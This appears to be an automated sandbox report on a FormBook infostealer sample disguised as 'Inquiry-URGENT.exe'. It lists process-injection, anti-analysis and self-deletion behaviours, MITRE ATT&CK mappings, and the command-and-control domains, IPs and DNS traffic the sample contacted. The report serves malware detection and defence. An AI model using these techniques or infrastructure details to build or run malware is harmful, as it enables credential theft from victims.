          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Code function: 3_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: B90000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Memory written: C:\Users\user\Desktop\Inquiry-URGENT.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Process created: C:\Users\user\Desktop\Inquiry-URGENT.exe C:\Users\user\Desktop\Inquiry-URGENT.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: explorer.exe, 00000005.00000000.709771298.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.674242485.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.677454070.0000000005E50000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.674242485.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.674242485.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.701954450.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Queries volume information: C:\Users\user\Desktop\Inquiry-URGENT.exe VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook (same Yara matches as listed under Stealing of Sensitive Information)

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

          Behavior Graph

          Behavior Graph ID: 491567 | Sample: Inquiry-URGENT.exe | Startdate: 27/09/2021 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.studyengland.com; www.novasaude-g1.online
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
            Inquiry-URGENT.exe (started)
              Dropped: C:\Users\user\...\Inquiry-URGENT.exe.log, ASCII
              Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
              Inquiry-URGENT.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected)
                  DNS/IP: www.lianshangtron.com; www.trasportesemmanuel.com 162.241.61.210, 49845, 80 UNIFIEDLAYER-AS-1US United States; 15 other IPs or domains
                  Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                  rundll32.exe (started)
                    Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                      conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Inquiry-URGENT.exe | 36% | Virustotal |
          Inquiry-URGENT.exe | 23% | Metadefender |
          Inquiry-URGENT.exe | 71% | ReversingLabs | Win32.Trojan.FormBook

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.2.Inquiry-URGENT.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          tameka-stewart.com | 1% | Virustotal |
          tovardarom.xyz | 1% | Virustotal |

          URLs

          Source | Detection | Scanner | Label

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.novasaude-g1.online | 172.67.153.117 | true | false | | unknown
          tameka-stewart.com | 184.168.131.241 | true | true | | unknown
          tovardarom.xyz | 213.5.70.60 | true | true | | unknown
          www.nutritionhawks.com | 74.208.236.139 | true | true | | unknown
          apexpropertiesltd.com | 34.102.136.180 | true | false | | unknown
          www.trasportesemmanuel.com | 162.241.61.210 | true | true | | unknown
          www.studyengland.com | 209.99.64.43 | true | true | | unknown
          www.lianshangtron.com | 103.100.209.77 | true | true | | unknown
          josiemaran-supernatural.com | 34.102.136.180 | true | false | | unknown
          khlopok.club | 34.252.217.69 | true | true | | unknown
          www.tameka-stewart.com | unknown | unknown | true | | unknown
          www.khlopok.club | unknown | unknown | true | | unknown
          www.tovardarom.xyz | unknown | unknown | true | | unknown
          www.lakeefctmich.com | unknown | unknown | true | | unknown
          www.apexpropertiesltd.com | unknown | unknown | true | | unknown
          www.bajajfinservmutualfund.com | unknown | unknown | true | | unknown
                                      www.zambiaedu.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.josiemaran-supernatural.com
                                        unknown
                                        unknowntrue
                                          unknown

                                          Contacted URLs


                                          URLs from Memory and Binaries


                                          Contacted IPs


                                          General Information

                                           Joe Sandbox Version: 33.0.0 White Diamond
                                           Analysis ID: 491567
                                           Start date: 27.09.2021
                                           Start time: 17:53:02
                                           Joe Sandbox Product: CloudBasic
                                           Overall analysis duration: 0h 11m 4s
                                           Hypervisor based Inspection enabled: false
                                           Report type: light
                                           Sample file name: Inquiry-URGENT.exe
                                           Cookbook file name: default.jbs
                                           Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                           Number of new started processes analysed: 18
                                           Number of new started drivers analysed: 0
                                           Number of existing processes analysed: 0
                                           Number of existing drivers analysed: 0
                                           Number of injected processes analysed: 0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                           Analysis Mode: default
                                           Analysis stop reason: Timeout
                                           Detection: MAL
                                           Classification: mal100.troj.evad.winEXE@7/1@13/7
                                           EGA Information: Failed
                                          HDC Information:
                                          • Successful, ratio: 14.4% (good quality ratio 12.8%)
                                          • Quality average: 73%
                                          • Quality standard deviation: 32%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.49.157.6
                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                           • Not all processes were analyzed; the report is missing behavior information

                                          Simulations

                                          Behavior and APIs

                                           Time | Type | Description
                                           17:53:59 | API Interceptor | 1x Sleep call for process: Inquiry-URGENT.exe modified

                                          Joe Sandbox View / Context

                                          IPs


                                          Domains


                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Inquiry-URGENT.exe.log
                                          Process:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.554495827272038
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Inquiry-URGENT.exe
                                          File size:443904
                                          MD5:001127ea6a36d3b93e8c54ff1b8f22b8
                                          SHA1:acd9171ec5641efc54a16c5c18184dd6e25138c8
                                          SHA256:2728dc98fdebc00823b877eba49ace782c17db8a07074634aafca9dc00277776
                                          SHA512:7a5687835380616daa433ce196fdb7badfcf74f0e1e4cb97c4064ac0eea1b633b0ed536ea409519d09a5f5c341861b1930242a3f8c706eb58f52defab8e2110f
                                          SSDEEP:12288:OIF/OGaxwRNRWMDABT4ZxzOiGLbrh9yU9:OIFy2NsMDA54Z8dbrhN9
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.Oa..............0.................. ........@.. ....................... ............@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x46d816
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x614FC662 [Sun Sep 26 01:01:22 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          (the same instruction repeats for the rest of the preview: the bytes after the jmp are zero padding, and 00 00 disassembles to add byte ptr [eax], al)

                                          Data Directories

                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0x6d7c4          0x4f          .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6e000          0x658         .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x70000          0xc           .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                          Sections

                                          Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                          .text   0x2000           0x6b81c       0x6ba00   False     0.852605981417   data       7.57244291129   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc   0x6e000          0x658         0x800     False     0.34033203125    data       3.53078512216   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc  0x70000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name         RVA      Size   Type                                                                         Language  Country
                                          RT_VERSION   0x6e090  0x3c8  data
                                          RT_MANIFEST  0x6e468  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLL          Import
                                          mscoree.dll  _CorExeMain

                                          Version Infos

                                          Description       Data
                                          Translation       0x0000 0x04b0
                                          LegalCopyright    Copyright 2018 - 2021
                                          Assembly Version  1.0.0.0
                                          InternalName      ResourceTableMappingEntryField.exe
                                          FileVersion       1.0.0.0
                                          CompanyName       XCodes
                                          LegalTrademarks
                                          Comments
                                          ProductName       Cafe Management Systems
                                          ProductVersion    1.0.0.0
                                          FileDescription   Cafe Management Systems
                                          OriginalFilename  ResourceTableMappingEntryField.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                          09/27/21-17:55:12.501653  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49802        80         192.168.2.4     34.102.136.180
                                          09/27/21-17:55:12.501653  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49802        80         192.168.2.4     34.102.136.180
                                          09/27/21-17:55:12.501653  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49802        80         192.168.2.4     34.102.136.180
                                          09/27/21-17:55:12.615388  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49802      34.102.136.180  192.168.2.4
                                          09/27/21-17:55:17.866120  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49818      34.102.136.180  192.168.2.4
                                          09/27/21-17:55:28.479546  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.4     34.252.217.69
                                          09/27/21-17:55:28.479546  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.4     34.252.217.69
                                          09/27/21-17:55:28.479546  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.4     34.252.217.69
                                          09/27/21-17:55:49.292538  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49843        80         192.168.2.4     103.100.209.77
                                          09/27/21-17:55:49.292538  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49843        80         192.168.2.4     103.100.209.77
                                          09/27/21-17:55:49.292538  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49843        80         192.168.2.4     103.100.209.77
                                          09/27/21-17:56:17.096940  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49871        80         192.168.2.4     209.99.64.43
                                          09/27/21-17:56:17.096940  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49871        80         192.168.2.4     209.99.64.43
                                          09/27/21-17:56:17.096940  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49871        80         192.168.2.4     209.99.64.43

                                          Network Port Distribution

                                          TCP Packets


                                          UDP Packets

                                          Sep 27, 2021 17:55:36.929743052 CEST53523378.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:37.640264034 CEST5504653192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:37.653201103 CEST53550468.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:38.722229958 CEST4961253192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:38.846456051 CEST53496128.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:43.865288973 CEST4928553192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:43.892141104 CEST53492858.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:48.908591032 CEST5060153192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:49.096210957 CEST53506018.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:54.525449038 CEST6087553192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:54.556010962 CEST53608758.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:00.082221985 CEST5644853192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:00.242336988 CEST53564488.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:06.646498919 CEST5917253192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:06.681133986 CEST53591728.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:09.745883942 CEST6242053192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:09.787056923 CEST53624208.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:16.813499928 CEST6057953192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:16.937889099 CEST53605798.8.8.8192.168.2.4

                                          DNS Queries

                                           Timestamp                            | Source IP   | Dest IP | Trans ID | OP Code            | Name                            | Type           | Class
                                           Sep 27, 2021 17:55:07.083395958 CEST | 192.168.2.4 | 8.8.8.8 | 0x8686   | Standard query (0) | www.lakeefctmich.com            | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:12.453551054 CEST | 192.168.2.4 | 8.8.8.8 | 0x205d   | Standard query (0) | www.josiemaran-supernatural.com | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:17.625284910 CEST | 192.168.2.4 | 8.8.8.8 | 0x186    | Standard query (0) | www.apexpropertiesltd.com       | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:22.896137953 CEST | 192.168.2.4 | 8.8.8.8 | 0xca11   | Standard query (0) | www.tameka-stewart.com          | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:28.364178896 CEST | 192.168.2.4 | 8.8.8.8 | 0x3350   | Standard query (0) | www.khlopok.club                | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:33.564146996 CEST | 192.168.2.4 | 8.8.8.8 | 0xad6b   | Standard query (0) | www.tovardarom.xyz              | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:38.722229958 CEST | 192.168.2.4 | 8.8.8.8 | 0xd08a   | Standard query (0) | www.zambiaedu.xyz               | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:43.865288973 CEST | 192.168.2.4 | 8.8.8.8 | 0x7f5e   | Standard query (0) | www.bajajfinservmutualfund.com  | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:48.908591032 CEST | 192.168.2.4 | 8.8.8.8 | 0xcc59   | Standard query (0) | www.lianshangtron.com           | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:55:54.525449038 CEST | 192.168.2.4 | 8.8.8.8 | 0x1fa1   | Standard query (0) | www.nutritionhawks.com          | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:56:00.082221985 CEST | 192.168.2.4 | 8.8.8.8 | 0x6578   | Standard query (0) | www.trasportesemmanuel.com      | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:56:06.646498919 CEST | 192.168.2.4 | 8.8.8.8 | 0xf40    | Standard query (0) | www.novasaude-g1.online         | A (IP address) | IN (0x0001)
                                           Sep 27, 2021 17:56:16.813499928 CEST | 192.168.2.4 | 8.8.8.8 | 0xc5ac   | Standard query (0) | www.studyengland.com            | A (IP address) | IN (0x0001)

                                          DNS Answers

                                           Timestamp                            | Source IP | Dest IP     | Trans ID | Reply Code         | Name                            | CName                       | Address         | Type                   | Class
                                           Sep 27, 2021 17:55:07.122678995 CEST | 8.8.8.8   | 192.168.2.4 | 0x8686   | Name error (3)     | www.lakeefctmich.com            | none                        | none            | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:55:12.482510090 CEST | 8.8.8.8   | 192.168.2.4 | 0x205d   | No error (0)       | www.josiemaran-supernatural.com | josiemaran-supernatural.com | -               | CNAME (Canonical name) | IN (0x0001)
                                           Sep 27, 2021 17:55:12.482510090 CEST | 8.8.8.8   | 192.168.2.4 | 0x205d   | No error (0)       | josiemaran-supernatural.com     | -                           | 34.102.136.180  | A (IP address)         | IN (0x0001)
